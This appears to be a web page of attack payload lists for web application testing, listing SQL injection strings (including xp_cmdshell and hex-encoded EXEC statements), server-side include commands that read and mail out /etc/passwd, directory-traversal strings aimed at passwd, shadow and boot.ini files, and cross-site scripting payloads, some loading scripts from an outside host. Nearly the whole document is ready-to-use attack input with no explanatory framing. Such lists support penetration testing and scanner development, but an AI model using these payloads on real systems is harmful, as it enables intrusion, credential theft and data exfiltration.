=== SQL Injection - (Update: 11 August 2009 - Total Statements: 126) ===<br />
<pre>Statement<br />
'sqlvuln<br />
'+sqlvuln<br />
sqlvuln;<br />
(sqlvuln)<br />
a' or 1=1--<br />
"a"" or 1=1--"<br />
or a = a<br />
a' or 'a' = 'a<br />
1 or 1=1<br />
a' waitfor delay '0:0:10'--<br />
1 waitfor delay '0:0:10'--<br />
declare @q nvarchar (4000) select @q =<br />
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A<br />
0<br />
031003000270000<br />
declare @s varchar(22) select @s =<br />
0x77616974666F722064656C61792027303A303A31302700 exec(@s)<br />
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)<br />
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e<br />
exec(@s)<br />
a'<br />
?<br />
' or 1=1<br />
‘ or 1=1 --<br />
x' AND userid IS NULL; --<br />
x' AND email IS NULL; --<br />
anything' OR 'x'='x<br />
x' AND 1=(SELECT COUNT(*) FROM tabname); --<br />
x' AND members.email IS NULL; --<br />
x' OR full_name LIKE '%Bob%<br />
23 OR 1=1<br />
'; exec master..xp_cmdshell 'ping 172.10.1.255'--<br />
'<br />
'%20or%20''='<br />
'%20or%20'x'='x<br />
%20or%20x=x<br />
')%20or%20('x'='x<br />
0 or 1=1<br />
' or 0=0 --<br />
" or 0=0 --<br />
or 0=0 --<br />
' or 0=0 #<br />
or 0=0 #"<br />
or 0=0 #<br />
' or 1=1--<br />
" or 1=1--<br />
' or '1'='1'--<br />
' or 1 --'<br />
or 1=1--<br />
or%201=1<br />
or%201=1 --<br />
' or 1=1 or ''='<br />
or 1=1 or ""=<br />
' or a=a--<br />
or a=a<br />
') or ('a'='a<br />
) or (a=a<br />
hi or a=a<br />
hi or 1=1 --"<br />
hi' or 1=1 --<br />
hi' or 'a'='a<br />
hi') or ('a'='a<br />
"hi"") or (""a""=""a"<br />
'hi' or 'x'='x';<br />
@variable<br />
,@variable<br />
PRINT<br />
PRINT @@variable<br />
select<br />
insert<br />
as<br />
or<br />
procedure<br />
limit<br />
order by<br />
asc<br />
desc<br />
delete<br />
update<br />
distinct<br />
having<br />
truncate<br />
replace<br />
like<br />
handler<br />
bfilename<br />
' or username like '%<br />
' or uname like '%<br />
' or userid like '%<br />
' or uid like '%<br />
' or user like '%<br />
exec xp<br />
exec sp<br />
'; exec master..xp_cmdshell<br />
'; exec xp_regread<br />
t'exec master..xp_cmdshell 'nslookup www.google.com'--<br />
--sp_password<br />
\x27UNION SELECT<br />
' UNION SELECT<br />
' UNION ALL SELECT<br />
' or (EXISTS)<br />
' (select top 1<br />
'||UTL_HTTP.REQUEST<br />
1;SELECT%20*<br />
to_timestamp_tz<br />
tz_offset<br />
&lt;&gt;"'%;)(&amp;+<br />
'%20or%201=1<br />
%27%20or%201=1<br />
%20$(sleep%2050)<br />
%20'sleep%2050'<br />
char%4039%41%2b%40SELECT<br />
&amp;apos;%20OR<br />
'sqlattempt1<br />
(sqlattempt2)<br />
|<br />
%7C<br />
*|<br />
%2A%7C<br />
*(|(mail=*))<br />
%2A%28%7C%28mail%3D%2A%29%29<br />
*(|(objectclass=*))<br />
%2A%28%7C%28objectclass%3D%2A%29%29<br />
(<br />
%28<br />
)<br />
%29<br />
&amp;<br />
%26<br />
!<br />
%21<br />
' or 1=1 or ''='<br />
' or ''='<br />
x' or 1=1 or 'x'='y<br />
/<br />
//<br />
//*<br />
*/*<br />
a' or 3=3--<br />
"a"" or 3=3--"<br />
' or 3=3<br />
‘ or 3=3 --<br />
</pre> <br />
=== SSI (Server Side Includes) - (Update: 30 July 2007 - Total Statements: 4) ===<br />
<pre><br />
# Some server side include statements<br />
# Florian Roth @4nc4p<br />
<br />
&lt;!--#exec cmd="/bin/ls /" --&gt;&lt;br/&gt;<br />
&lt;!--#exec cmd="cat /etc/passwd" --&gt;&lt;br/&gt;<br />
&lt;!--#exec cmd="find / -name *.* -print" --&gt;&lt;br/&gt;<br />
&lt;!--#exec cmd="mail Florian Roth @4nc4p &lt;mailto:Florian Roth @4nc4p&gt; &lt; cat /etc/passwd" --&gt;&lt;br/&gt;<br />
</pre><br />
<br />
=== Directory Traversal - (Update: 11 August 2009 - Total Statements: 132) ===<br />
<pre>Statement<br />
\..\WINDOWS\win.ini<br />
\..\..\WINDOWS\win.ini<br />
\..\..\..\WINDOWS\win.ini<br />
\..\..\..\..\WINDOWS\win.ini<br />
\..\..\..\..\..\WINDOWS\win.ini<br />
\..\..\..\..\..\..\WINDOWS\win.ini<br />
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39<br />
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39<br />
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39<br />
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39<br />
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
../../../../../../../../../etc/passwd<br />
../../../../../../../../etc/passwd<br />
../../../../../../../etc/passwd<br />
../../../../../../etc/passwd<br />
../../../../../etc/passwd<br />
../../../../etc/passwd<br />
../../../etc/passwd<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34<br />
../../../.htaccess<br />
../../.htaccess<br />
../.htaccess<br />
.htaccess<br />
././.htaccess<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73<br />
%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73<br />
%2e%2e%2f%2e%68%74%61%63%63%65%73%73<br />
%2e%68%74%61%63%63%65%73%73<br />
%2e%2f%2e%2f%2e%68%74%61%63%63%65%73%73<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33<br />
%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33<br />
%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33<br />
%%32%65%%32%66%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33<br />
../../../../../../../../../../../../etc/hosts%00<br />
../../../../../../../../../../../../etc/hosts<br />
../../boot.ini<br />
/../../../../../../../../%2A<br />
../../../../../../../../../../../../etc/passwd%00<br />
../../../../../../../../../../../../etc/passwd<br />
../../../../../../../../../../../../etc/shadow%00<br />
../../../../../../../../../../../../etc/shadow<br />
/../../../../../../../../../../etc/passwd^^<br />
/../../../../../../../../../../etc/shadow^^<br />
/../../../../../../../../../../etc/passwd<br />
/../../../../../../../../../../etc/shadow<br />
/./././././././././././etc/passwd<br />
/./././././././././././etc/shadow<br />
\..\..\..\..\..\..\..\..\..\..\etc\passwd<br />
\..\..\..\..\..\..\..\..\..\..\etc\shadow<br />
..\..\..\..\..\..\..\..\..\..\etc\passwd<br />
..\..\..\..\..\..\..\..\..\..\etc\shadow<br />
/..\../..\../..\../..\../..\../..\../etc/passwd<br />
/..\../..\../..\../..\../..\../..\../etc/shadow<br />
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd<br />
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow<br />
\..\..\..\..\..\..\..\..\..\..\etc\passwd%00<br />
\..\..\..\..\..\..\..\..\..\..\etc\shadow%00<br />
..\..\..\..\..\..\..\..\..\..\etc\passwd%00<br />
..\..\..\..\..\..\..\..\..\..\etc\shadow%00<br />
%0a/bin/cat%20/etc/passwd<br />
%0a/bin/cat%20/etc/shadow<br />
%00/etc/passwd%00<br />
%00/etc/shadow%00<br />
%00../../../../../../etc/passwd<br />
%00../../../../../../etc/shadow<br />
/../../../../../../../../../../../etc/passwd%00.jpg<br />
/../../../../../../../../../../../etc/passwd%00.html<br />
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd<br />
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow<br />
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd<br />
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow<br />
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00<br />
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00<br />
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%<br />
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini<br />
\\&amp;apos;/bin/cat%20/etc/passwd\\&amp;apos;<br />
\\&amp;apos;/bin/cat%20/etc/shadow\\&amp;apos;<br />
../../../../../../../../conf/server.xml<br />
/../../../../../../../../bin/id|<br />
C:/inetpub/wwwroot/global.asa<br />
C:\inetpub\wwwroot\global.asa<br />
C:/boot.ini<br />
C:\boot.ini<br />
../../../../../../../../../../../../localstart.asp%00<br />
../../../../../../../../../../../../localstart.asp<br />
../../../../../../../../../../../../boot.ini%00<br />
../../../../../../../../../../../../boot.ini<br />
/./././././././././././boot.ini<br />
/../../../../../../../../../../../boot.ini%00<br />
/../../../../../../../../../../../boot.ini<br />
/..\../..\../..\../..\../..\../..\../boot.ini<br />
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini<br />
\..\..\..\..\..\..\..\..\..\..\boot.ini<br />
..\..\..\..\..\..\..\..\..\..\boot.ini%00<br />
..\..\..\..\..\..\..\..\..\..\boot.ini<br />
/../../../../../../../../../../../boot.ini%00.html<br />
/../../../../../../../../../../../boot.ini%00.jpg<br />
/.../.../.../.../.../<br />
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini<br />
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini<br />
</pre> <br />
''Sorry for breaking the layout - but "breaking the layout" could become "breaking the software".'' <br />
<br />
=== XSS Discovery Statements ===<br />
<br />
Discovery Statements<br />
<pre># Discovery Statements (July 2007)<br />
# Statements used to cause exploitable errors<br />
# Florian Roth @4nc4p<br />
<br />
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--&gt;&lt;/SCRIPT&gt;"&gt;'&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt; <br />
'';!--"&lt;XSS&gt;=&amp;{()}<br />
</pre> <br />
<br />
Common exploit code <br />
<pre># Best Statements (July 2007)<br />
# Statements covering 90% of all vulnerabilities <br />
# Florian Roth @4nc4p<br />
<br />
'&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;&lt;img src="" alt='<br />
"&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;&lt;img src="" alt="<br />
\'&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;&lt;img src="" alt=\'<br />
'); alert('xss'); var x='<br />
\\'); alert(\'xss\');var x=\'<br />
//--&gt;&lt;/SCRIPT&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83));<br />
</pre><br />
<br />
Full List - (Update: 11 August 2009 - Total Statements: 162) <br />
<pre># Full List (July 2007)<br />
# All Statements - Full List <br />
# Based on the XSS cheat sheet <br />
# http://ha.ckers.org/xss.html<br />
# Florian Roth @4nc4p<br />
<br />
&lt;SCRIPT SRC=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;<br />
"&lt;IMG SRC=""javascript:alert('XSS');""&gt;"<br />
&lt;IMG SRC=JaVaScRiPt:alert('XSS')&gt;<br />
"&lt;IMG SRC=javascript:alert(""XSS"")&gt;"<br />
"&lt;IMG SRC=`javascript:alert(""RSnake says, 'XSS'"")`&gt;"<br />
"&lt;IMG """"""&gt;&lt;SCRIPT&gt;alert(""XSS"")&lt;/SCRIPT&gt;""&gt;"<br />
&lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&gt;<br />
&lt;IMG SRC=&amp;#0000106&amp;#0000097&amp;#0000118&amp;#0000097&amp;#0000115&amp;#0000099&amp;#0000114&amp;#0000105&amp;#0000112&amp;#0000116&amp;#0000058&amp;#0000097&amp;#0000108&amp;#0000101&amp;#0000114&amp;#0000116&amp;#0000040&amp;#0000039&amp;#0000088&amp;#0000083&amp;#0000083&amp;#0000039&amp;#0000041&gt;<br />
&lt;IMG SRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29&gt;<br />
"&lt;IMG SRC=""jav"<br />
"ascript:alert('XSS');""&gt;"<br />
"perl -e 'print ""&lt;IMG SRC=java\0script:alert(\""XSS\"")&gt;"";' &gt; out"<br />
"perl -e 'print ""&lt;SCR\0IPT&gt;alert(\""XSS\"")&lt;/SCR\0IPT&gt;"";' &gt; out"<br />
"&lt;IMG SRC="" &amp;#14; javascript:alert('XSS');""&gt;"<br />
"&lt;SCRIPT/XSS SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"<br />
"&lt;BODY onload!#$%&amp;()*~+-_.,:;?@[/|\]^`=alert(""XSS"")&gt;"<br />
"&lt;SCRIPT/SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"<br />
"&lt;&lt;SCRIPT&gt;alert(""XSS"");//&lt;&lt;/SCRIPT&gt;"<br />
&lt;SCRIPT SRC=http://ha.ckers.org/xss.js?&lt;B&gt;<br />
&lt;SCRIPT SRC=//ha.ckers.org/.j&gt;<br />
"&lt;IMG SRC=""javascript:alert('XSS')"""<br />
&lt;iframe src=http://ha.ckers.org/scriptlet.html &lt;<br />
&lt;SCRIPT&gt;a=/XSS/\nalert(a.source)&lt;/SCRIPT&gt;<br />
"\"";alert('XSS');//"<br />
"&lt;/TITLE&gt;&lt;SCRIPT&gt;alert(""XSS"");&lt;/SCRIPT&gt;"<br />
"&lt;INPUT TYPE=""IMAGE"" SRC=""javascript:alert('XSS');""&gt;"<br />
"&lt;BODY BACKGROUND=""javascript:alert('XSS')""&gt;"<br />
&lt;BODY ONLOAD=alert('XSS')&gt;<br />
"&lt;IMG DYNSRC=""javascript:alert('XSS')""&gt;"<br />
"&lt;IMG LOWSRC=""javascript:alert('XSS')""&gt;"<br />
"&lt;BGSOUND SRC=""javascript:alert('XSS');""&gt;"<br />
"&lt;BR SIZE=""&amp;{alert('XSS')}""&gt;"<br />
"&lt;LAYER SRC=""http://ha.ckers.org/scriptlet.html""&gt;&lt;/LAYER&gt;"<br />
"&lt;LINK REL=""stylesheet"" HREF=""javascript:alert('XSS');""&gt;"<br />
"&lt;LINK REL=""stylesheet"" HREF=""http://ha.ckers.org/xss.css""&gt;"<br />
&lt;STYLE&gt;@import'http://ha.ckers.org/xss.css';&lt;/STYLE&gt;<br />
"&lt;META HTTP-EQUIV=""Link"" Content=""&lt;http://ha.ckers.org/xss.css&gt;; REL=stylesheet""&gt;"<br />
"&lt;STYLE&gt;BODY{-moz-binding:url(""http://ha.ckers.org/xssmoz.xml#xss"")}&lt;/STYLE&gt;"<br />
"&lt;XSS STYLE=""behavior: url(xss.htc);""&gt;"<br />
"&lt;STYLE&gt;li {list-style-image: url(""javascript:alert('XSS')"");}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS"<br />
"&lt;IMG SRC='vbscript:msgbox(""XSS"")'&gt;"<br />
¼script¾alert(¢XSS¢)¼/script¾<br />
"&lt;META HTTP-EQUIV=""refresh"" CONTENT=""0;url=javascript:alert('XSS');""&gt;"<br />
"&lt;META HTTP-EQUIV=""refresh"" CONTENT=""0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K""&gt;"<br />
"&lt;META HTTP-EQUIV=""refresh"" CONTENT=""0; URL=http://;URL=javascript:alert('XSS');""&gt;"<br />
"&lt;IFRAME SRC=""javascript:alert('XSS');""&gt;&lt;/IFRAME&gt;"<br />
"&lt;FRAMESET&gt;&lt;FRAME SRC=""javascript:alert('XSS');""&gt;&lt;/FRAMESET&gt;"<br />
"&lt;TABLE BACKGROUND=""javascript:alert('XSS')""&gt;"<br />
"&lt;TABLE&gt;&lt;TD BACKGROUND=""javascript:alert('XSS')""&gt;"<br />
"&lt;DIV STYLE=""background-image: url(javascript:alert('XSS'))""&gt;"<br />
"&lt;DIV STYLE=""background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029""&gt;"<br />
"&lt;DIV STYLE=""background-image: url(&amp;#1;javascript:alert('XSS'))""&gt;"<br />
"&lt;DIV STYLE=""width: expression(alert('XSS'));""&gt;"<br />
"&lt;STYLE&gt;@im\port'\ja\vasc\ript:alert(""XSS"")';&lt;/STYLE&gt;"<br />
"&lt;IMG STYLE=""xss:expr/*XSS*/ession(alert('XSS'))""&gt;"<br />
"&lt;XSS STYLE=""xss:expression(alert('XSS'))""&gt;"<br />
"exp/*&lt;A STYLE='no\xss:noxss(""*//*"");xss:ex/*XSS*//*/*/pression(alert(""XSS""))'&gt;"<br />
"&lt;STYLE TYPE=""text/javascript""&gt;alert('XSS');&lt;/STYLE&gt;"<br />
"&lt;STYLE&gt;.XSS{background-image:url(""javascript:alert('XSS')"");}&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt;"<br />
"&lt;STYLE type=""text/css""&gt;BODY{background:url(""javascript:alert('XSS')"")}&lt;/STYLE&gt;"<br />
&lt;!--[if gte IE 4]&gt;&lt;SCRIPT&gt;alert('XSS');&lt;/SCRIPT&gt;&lt;![endif]--&gt;<br />
"&lt;BASE HREF=""javascript:alert('XSS');//""&gt;"<br />
"&lt;OBJECT TYPE=""text/x-scriptlet"" DATA=""http://ha.ckers.org/scriptlet.html""&gt;&lt;/OBJECT&gt;"<br />
&lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&gt;&lt;param name=url value=javascript:alert('XSS')&gt;&lt;/OBJECT&gt;<br />
"&lt;EMBED SRC=""http://ha.ckers.org/xss.swf"" AllowScriptAccess=""always""&gt;&lt;/EMBED&gt;"<br />
"&lt;EMBED SRC=""data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg=="" type=""image/svg+xml"" AllowScriptAccess=""always""&gt;&lt;/EMBED&gt;"<br />
"&lt;HTML xmlns:xss&gt;&lt;?import namespace=""xss"" implementation=""http://ha.ckers.org/xss.htc""&gt;&lt;xss:xss&gt;XSS&lt;/xss:xss&gt;&lt;/HTML&gt;"<br />
"&lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;![CDATA[&lt;IMG SRC=""javas]]&gt;&lt;![CDATA[cript:alert('XSS');""&gt;]]&gt;&lt;/C&gt;&lt;/X&gt;&lt;/xml&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;"<br />
"&lt;XML ID=""xss""&gt;&lt;I&gt;&lt;B&gt;&lt;IMG SRC=""javas&lt;!-- --&gt;cript:alert('XSS')""&gt;&lt;/B&gt;&lt;/I&gt;&lt;/XML&gt;&lt;SPAN DATASRC=""#xss"" DATAFLD=""B"" DATAFORMATAS=""HTML""&gt;&lt;/SPAN&gt;"<br />
"&lt;XML SRC=""xsstest.xml"" ID=I&gt;&lt;/XML&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;"<br />
"&lt;HTML&gt;&lt;BODY&gt;&lt;?xml:namespace prefix=""t"" ns=""urn:schemas-microsoft-com:time""&gt;&lt;?import namespace=""t"" implementation=""#default#time2""&gt;&lt;t:set attributeName=""innerHTML"" to=""XSS&lt;SCRIPT DEFER&gt;alert(""XSS"")&lt;/SCRIPT&gt;""&gt;&lt;/BODY&gt;&lt;/HTML&gt;"<br />
"&lt;SCRIPT SRC=""http://ha.ckers.org/xss.jpg""&gt;&lt;/SCRIPT&gt;"<br />
"&lt;!--#exec cmd=""/bin/echo '&lt;SCR'""--&gt;&lt;!--#exec cmd=""/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;'""--&gt;"<br />
"&lt;? echo('&lt;SCR)';echo('IPT&gt;alert(""XSS"")&lt;/SCRIPT&gt;');&nbsp;?&gt;"<br />
"&lt;META HTTP-EQUIV=""Set-Cookie"" Content=""USERID=&lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;""&gt;"<br />
"&lt;HEAD&gt;&lt;META HTTP-EQUIV=""CONTENT-TYPE"" CONTENT=""text/html; charset=UTF-7""&gt; &lt;/HEAD&gt;+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-"<br />
"&lt;SCRIPT a=""&gt;"" SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"<br />
"&lt;SCRIPT =""&gt;"" SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"<br />
"&lt;SCRIPT a=""&gt;"" '' SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"<br />
"&lt;SCRIPT ""a='&gt;'"" SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"<br />
"&lt;SCRIPT a=`&gt;` SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"<br />
"&lt;SCRIPT a=""&gt;'&gt;"" SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"<br />
"&lt;SCRIPT&gt;document.write(""&lt;SCRI"");&lt;/SCRIPT&gt;PT SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"<br />
"&lt;A HREF=""http://66.102.7.147/""&gt;XSS&lt;/A&gt;"<br />
